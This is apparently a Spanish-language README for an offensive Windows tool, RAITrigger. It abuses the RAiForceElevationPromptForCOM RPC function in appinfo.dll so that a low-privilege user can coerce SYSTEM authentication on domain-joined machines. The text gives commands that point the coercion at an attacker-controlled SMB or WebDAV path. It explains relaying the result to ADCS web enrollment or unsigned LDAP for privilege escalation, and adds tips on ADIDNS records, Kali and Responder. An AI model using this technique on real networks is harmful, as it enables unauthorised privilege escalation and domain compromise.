
Disparador de autenticación de SYSTEM local para retransmisión
La función RPC RAiForceElevationPromptForCOM de la biblioteca appinfo.dll permite la coerción de SYSTEM. Esto solo funciona en sistemas unidos a un dominio. Resulta que esta función puede ser llamada por cualquier usuario con bajos privilegios (no para lanzar un proceso) sino para provocar autenticación de SYSTEM hacia una ubicación arbitraria. Esto se debe a que CreateFileW es llamado como SYSTEM hacia la ubicación del primer parámetro de entrada:
Dado que el usuario con bajos privilegios aún está suplantado, esto no puede usarse como disparador Potato para elevar privilegios de SEImpersonate a SYSTEM:
Pero puede usarse para solicitar un certificado de cuenta de equipo contra ADCS cuando la inscripción web está habilitada con la autenticación SMB entrante. O puede usarse para LPE con relay hacia LDAP, cuando la firma LDAP no esté habilitada.
Para activar la autenticación SMB:
[*] RAITrigger.exe \\attackerip\test\test.exe
Para activar la autenticación HTTP (el servicio WebClient debe estar habilitado):
[*] RAITrigger.exe \\hostname@80\test\test.exe
La autenticación HTTP solo se activa hacia sistemas de la zona de intranet de confianza, por lo que necesitarás crear un registro ADIDNS para tu IP de Kali o estar en la misma subred y usar, p. ej., Responder. Nunca uses el FQDN completo, solo el nombre de host.
Llamar a esta función de forma remota (incluso con administrador local) produce rpc_access_denied, por lo que no es una alternativa a, p. ej., PetitPotam o similares: